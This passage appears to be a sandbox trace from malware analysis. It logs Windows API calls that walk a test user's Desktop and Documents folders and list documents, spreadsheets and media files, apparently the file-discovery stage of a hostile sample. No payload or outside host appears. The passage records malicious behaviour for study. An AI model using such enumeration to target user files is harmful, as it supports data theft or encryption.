ftCreationTime.dwHighDateTime=0x1d89827, ftLastAccessTime.dwLowDateTime=0x16e79b70, ftLastAccessTime.dwHighDateTime=0x1d899b4, ftLastWriteTime.dwLowDateTime=0x16e79b70, ftLastWriteTime.dwHighDateTime=0x1d899b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.981] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0184.981] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa166e050, ftCreationTime.dwHighDateTime=0x1d89827, ftLastAccessTime.dwLowDateTime=0x16e79b70, ftLastAccessTime.dwHighDateTime=0x1d899b4, ftLastWriteTime.dwLowDateTime=0x16e79b70, ftLastWriteTime.dwHighDateTime=0x1d899b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.981] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7648ce00, ftCreationTime.dwHighDateTime=0x1d899db, ftLastAccessTime.dwLowDateTime=0x8bd6ff80, ftLastAccessTime.dwHighDateTime=0x1d8a566, ftLastWriteTime.dwLowDateTime=0x8bd6ff80, ftLastWriteTime.dwHighDateTime=0x1d8a566, nFileSizeHigh=0x0, nFileSizeLow=0x132ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3YgFUJ.rtf", cAlternateFileName="")) returned 1 [0184.981] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0879660, ftCreationTime.dwHighDateTime=0x1d89783, ftLastAccessTime.dwLowDateTime=0x5980510, ftLastAccessTime.dwHighDateTime=0x1d89e2f, ftLastWriteTime.dwLowDateTime=0x5980510, ftLastWriteTime.dwHighDateTime=0x1d89e2f, nFileSizeHigh=0x0, nFileSizeLow=0x12a30, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3YsVCZXV.bmp", cAlternateFileName="")) returned 1 [0184.981] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x407eb340, ftCreationTime.dwHighDateTime=0x1d8983a, ftLastAccessTime.dwLowDateTime=0x182d2600, ftLastAccessTime.dwHighDateTime=0x1d8a213, ftLastWriteTime.dwLowDateTime=0x182d2600, ftLastWriteTime.dwHighDateTime=0x1d8a213, nFileSizeHigh=0x0, nFileSizeLow=0xdcfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9eCWyh_E3fHJU.avi", cAlternateFileName="9ECWYH~1.AVI")) returned 1 [0184.981] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x407eb340, ftCreationTime.dwHighDateTime=0x1d8983a, ftLastAccessTime.dwLowDateTime=0x182d2600, ftLastAccessTime.dwHighDateTime=0x1d8a213, ftLastWriteTime.dwLowDateTime=0x182d2600, ftLastWriteTime.dwHighDateTime=0x1d8a213, nFileSizeHigh=0x0, nFileSizeLow=0xdcfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9eCWyh_E3fHJU.avi", cAlternateFileName="9ECWYH~1.AVI")) returned 0 [0184.982] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.982] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.982] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\") returned="sj76aMesI3jmtOuE2hz\\" [0184.982] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0184.982] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.982] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.982] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.982] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.982] PathFindFileNameW (pszPath="") returned="" [0184.982] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\sj76aMesI3jmtOuE2hz\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\sj76amesi3jmtoue2hz\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44854050, ftCreationTime.dwHighDateTime=0x1d896da, ftLastAccessTime.dwLowDateTime=0xc153cac0, ftLastAccessTime.dwHighDateTime=0x1d897f7, ftLastWriteTime.dwLowDateTime=0xc153cac0, ftLastWriteTime.dwHighDateTime=0x1d897f7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.989] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0184.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44854050, ftCreationTime.dwHighDateTime=0x1d896da, ftLastAccessTime.dwLowDateTime=0xc153cac0, ftLastAccessTime.dwHighDateTime=0x1d897f7, ftLastWriteTime.dwLowDateTime=0xc153cac0, ftLastWriteTime.dwHighDateTime=0x1d897f7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b652eb0, ftCreationTime.dwHighDateTime=0x1d898e0, ftLastAccessTime.dwLowDateTime=0x2168b310, ftLastAccessTime.dwHighDateTime=0x1d89976, ftLastWriteTime.dwLowDateTime=0x2168b310, ftLastWriteTime.dwHighDateTime=0x1d89976, nFileSizeHigh=0x0, nFileSizeLow=0x9a4f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6pW8RpGL-.flv", cAlternateFileName="6PW8RP~1.FLV")) returned 1 [0184.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987f5530, ftCreationTime.dwHighDateTime=0x1d8a2bd, ftLastAccessTime.dwLowDateTime=0x45d6dab0, ftLastAccessTime.dwHighDateTime=0x1d8a58d, ftLastWriteTime.dwLowDateTime=0x45d6dab0, ftLastWriteTime.dwHighDateTime=0x1d8a58d, nFileSizeHigh=0x0, nFileSizeLow=0xcad9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tkVyxwxrQ.ots", cAlternateFileName="TKVYXW~1.OTS")) returned 1 [0184.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2dce4250, ftCreationTime.dwHighDateTime=0x1d896ec, ftLastAccessTime.dwLowDateTime=0x45eff2e0, ftLastAccessTime.dwHighDateTime=0x1d8a31a, ftLastWriteTime.dwLowDateTime=0x45eff2e0, ftLastWriteTime.dwHighDateTime=0x1d8a31a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UovhOsbqK0eMsW0c", cAlternateFileName="UOVHOS~1")) returned 1 [0184.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde474710, ftCreationTime.dwHighDateTime=0x1d8a256, ftLastAccessTime.dwLowDateTime=0xc3454f10, ftLastAccessTime.dwHighDateTime=0x1d8a630, ftLastWriteTime.dwLowDateTime=0xc3454f10, ftLastWriteTime.dwHighDateTime=0x1d8a630, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YUyI2uqRriEqQVB sFMm", cAlternateFileName="YUYI2U~1")) returned 1 [0184.989] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde474710, ftCreationTime.dwHighDateTime=0x1d8a256, ftLastAccessTime.dwLowDateTime=0xc3454f10, ftLastAccessTime.dwHighDateTime=0x1d8a630, ftLastWriteTime.dwLowDateTime=0xc3454f10, ftLastWriteTime.dwHighDateTime=0x1d8a630, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YUyI2uqRriEqQVB sFMm", cAlternateFileName="YUYI2U~1")) returned 0 [0184.989] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0184.990] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.990] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.990] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\") returned="hhuy\\" [0184.990] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.990] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.990] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.991] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.991] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.991] PathFindFileNameW (pszPath="") returned="" [0184.991] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c9eb00, ftCreationTime.dwHighDateTime=0x1d89ace, ftLastAccessTime.dwLowDateTime=0xf19708e0, ftLastAccessTime.dwHighDateTime=0x1d89e4c, ftLastWriteTime.dwLowDateTime=0xf19708e0, ftLastWriteTime.dwHighDateTime=0x1d89e4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.993] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.993] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c9eb00, ftCreationTime.dwHighDateTime=0x1d89ace, ftLastAccessTime.dwLowDateTime=0xf19708e0, ftLastAccessTime.dwHighDateTime=0x1d89e4c, ftLastWriteTime.dwLowDateTime=0xf19708e0, ftLastWriteTime.dwHighDateTime=0x1d89e4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4105fa0, ftCreationTime.dwHighDateTime=0x1d897de, ftLastAccessTime.dwLowDateTime=0xf4481430, ftLastAccessTime.dwHighDateTime=0x1d8991f, ftLastWriteTime.dwLowDateTime=0xf4481430, ftLastWriteTime.dwHighDateTime=0x1d8991f, nFileSizeHigh=0x0, nFileSizeLow=0x163c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4Q235S.pptx", cAlternateFileName="4Q235S~1.PPT")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x322ee1b0, ftCreationTime.dwHighDateTime=0x1d89bec, ftLastAccessTime.dwLowDateTime=0x62947bb0, ftLastAccessTime.dwHighDateTime=0x1d8a6b1, ftLastWriteTime.dwLowDateTime=0x62947bb0, ftLastWriteTime.dwHighDateTime=0x1d8a6b1, nFileSizeHigh=0x0, nFileSizeLow=0x7be6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6a8RDH85d8whH-HX.pptx", cAlternateFileName="6A8RDH~1.PPT")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ca4940, ftCreationTime.dwHighDateTime=0x1d89f08, ftLastAccessTime.dwLowDateTime=0x8cf56720, ftLastAccessTime.dwHighDateTime=0x1d8a40e, ftLastWriteTime.dwLowDateTime=0x8cf56720, ftLastWriteTime.dwHighDateTime=0x1d8a40e, nFileSizeHigh=0x0, nFileSizeLow=0x8116, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="84p7mNA.doc", cAlternateFileName="")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14871610, ftCreationTime.dwHighDateTime=0x1d8a28f, ftLastAccessTime.dwLowDateTime=0xfa7bb540, ftLastAccessTime.dwHighDateTime=0x1d8a677, ftLastWriteTime.dwLowDateTime=0xfa7bb540, ftLastWriteTime.dwHighDateTime=0x1d8a677, nFileSizeHigh=0x0, nFileSizeLow=0x9d8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8tIQYXue.odp", cAlternateFileName="")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ff3ab40, ftCreationTime.dwHighDateTime=0x1d89b8a, ftLastAccessTime.dwLowDateTime=0xf1d84350, ftLastAccessTime.dwHighDateTime=0x1d8a2fc, ftLastWriteTime.dwLowDateTime=0xf1d84350, ftLastWriteTime.dwHighDateTime=0x1d8a2fc, nFileSizeHigh=0x0, nFileSizeLow=0x83b8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bJu5IwGZcIVxDeaCzVA1.odt", cAlternateFileName="BJU5IW~1.ODT")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeff93000, ftCreationTime.dwHighDateTime=0x1d896fc, ftLastAccessTime.dwLowDateTime=0xd8cf2bb0, ftLastAccessTime.dwHighDateTime=0x1d8a542, ftLastWriteTime.dwLowDateTime=0xd8cf2bb0, ftLastWriteTime.dwHighDateTime=0x1d8a542, nFileSizeHigh=0x0, nFileSizeLow=0x18065, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FNDguil2uBhXleqMkv.odt", cAlternateFileName="FNDGUI~1.ODT")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x863f90f0, ftCreationTime.dwHighDateTime=0x1d8976a, ftLastAccessTime.dwLowDateTime=0xec128660, ftLastAccessTime.dwHighDateTime=0x1d89b22, ftLastWriteTime.dwLowDateTime=0xec128660, ftLastWriteTime.dwHighDateTime=0x1d89b22, nFileSizeHigh=0x0, nFileSizeLow=0x14074, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gGXI3yELl78C2wDp.pps", cAlternateFileName="GGXI3Y~1.PPS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11a3a5d0, ftCreationTime.dwHighDateTime=0x1d8a4ab, ftLastAccessTime.dwLowDateTime=0x1010eed0, ftLastAccessTime.dwHighDateTime=0x1d8a5d2, ftLastWriteTime.dwLowDateTime=0x1010eed0, ftLastWriteTime.dwHighDateTime=0x1d8a5d2, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="igCF Ho.ppt", cAlternateFileName="IGCFHO~1.PPT")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e7b22f0, ftCreationTime.dwHighDateTime=0x1d8a0e4, ftLastAccessTime.dwLowDateTime=0x82c79ee0, ftLastAccessTime.dwHighDateTime=0x1d8a629, ftLastWriteTime.dwLowDateTime=0x82c79ee0, ftLastWriteTime.dwHighDateTime=0x1d8a629, nFileSizeHigh=0x0, nFileSizeLow=0x522e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkSu2OlxWSDLnSWvMq.ods", cAlternateFileName="JKSU2O~1.ODS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f0acfc0, ftCreationTime.dwHighDateTime=0x1d89e12, ftLastAccessTime.dwLowDateTime=0x8de5e560, ftLastAccessTime.dwHighDateTime=0x1d89f9f, ftLastWriteTime.dwLowDateTime=0x8de5e560, ftLastWriteTime.dwHighDateTime=0x1d89f9f, nFileSizeHigh=0x0, nFileSizeLow=0xe3f5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="naiagGM8S5tSkx.docx", cAlternateFileName="NAIAGG~1.DOC")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28a4d680, ftCreationTime.dwHighDateTime=0x1d8a539, ftLastAccessTime.dwLowDateTime=0x1da3cfd0, ftLastAccessTime.dwHighDateTime=0x1d8a740, ftLastWriteTime.dwLowDateTime=0x1da3cfd0, ftLastWriteTime.dwHighDateTime=0x1d8a740, nFileSizeHigh=0x0, nFileSizeLow=0x597e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ni1u7VXc2C N4UUHwH.pps", cAlternateFileName="NI1U7V~1.PPS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15eda4b0, ftCreationTime.dwHighDateTime=0x1d899ac, ftLastAccessTime.dwLowDateTime=0xc0470410, ftLastAccessTime.dwHighDateTime=0x1d89de9, ftLastWriteTime.dwLowDateTime=0xc0470410, ftLastWriteTime.dwHighDateTime=0x1d89de9, nFileSizeHigh=0x0, nFileSizeLow=0xa5ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NxH6NL2Af5s5IGX.doc", cAlternateFileName="NXH6NL~1.DOC")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc812f040, ftCreationTime.dwHighDateTime=0x1d89728, ftLastAccessTime.dwLowDateTime=0xa0012480, ftLastAccessTime.dwHighDateTime=0x1d89a45, ftLastWriteTime.dwLowDateTime=0xa0012480, ftLastWriteTime.dwHighDateTime=0x1d89a45, nFileSizeHigh=0x0, nFileSizeLow=0x195d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Qs2 hK9Y_.xlsx", cAlternateFileName="QS2HK9~1.XLS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa778bd90, ftCreationTime.dwHighDateTime=0x1d8a387, ftLastAccessTime.dwLowDateTime=0xdd6ea820, ftLastAccessTime.dwHighDateTime=0x1d8a408, ftLastWriteTime.dwLowDateTime=0xdd6ea820, ftLastWriteTime.dwHighDateTime=0x1d8a408, nFileSizeHigh=0x0, nFileSizeLow=0x18588, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r FiXNL1vU2.ots", cAlternateFileName="RFIXNL~1.OTS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x123a2b90, ftCreationTime.dwHighDateTime=0x1d8a25d, ftLastAccessTime.dwLowDateTime=0x79c5c30, ftLastAccessTime.dwHighDateTime=0x1d8a2f3, ftLastWriteTime.dwLowDateTime=0x79c5c30, ftLastWriteTime.dwHighDateTime=0x1d8a2f3, nFileSizeHigh=0x0, nFileSizeLow=0x12685, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U-GFPMIYoqWy2p9O.xlsx", cAlternateFileName="U-GFPM~1.XLS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb910a00, ftCreationTime.dwHighDateTime=0x1d8971a, ftLastAccessTime.dwLowDateTime=0xf73af9e0, ftLastAccessTime.dwHighDateTime=0x1d8a60e, ftLastWriteTime.dwLowDateTime=0xf73af9e0, ftLastWriteTime.dwHighDateTime=0x1d8a60e, nFileSizeHigh=0x0, nFileSizeLow=0x1332f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YnkbYRnkC6J3AvV0Zier.odt", cAlternateFileName="YNKBYR~1.ODT")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d8c9850, ftCreationTime.dwHighDateTime=0x1d8a07d, ftLastAccessTime.dwLowDateTime=0x243aa730, ftLastAccessTime.dwHighDateTime=0x1d8a6fd, ftLastWriteTime.dwLowDateTime=0x243aa730, ftLastWriteTime.dwHighDateTime=0x1d8a6fd, nFileSizeHigh=0x0, nFileSizeLow=0x75ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yTkydbos.xlsx", cAlternateFileName="YTKYDB~1.XLS")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 1 [0184.994] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0 [0184.994] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0184.995] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.996] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Music\\") returned="My Music\\" [0184.996] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.996] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.996] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.996] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.996] PathFindFileNameW (pszPath="") returned="" [0184.996] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0xffffffff [0184.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0184.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fe8 | out: hHeap=0x620000) returned 1 [0184.996] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0184.996] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.996] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\") returned="My Pictures\\" [0184.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.997] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.997] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e84010 | out: hHeap=0x620000) returned 1 [0184.997] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.997] PathFindFileNameW (pszPath="") returned="" [0184.997] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0xffffffff [0184.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0184.997] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 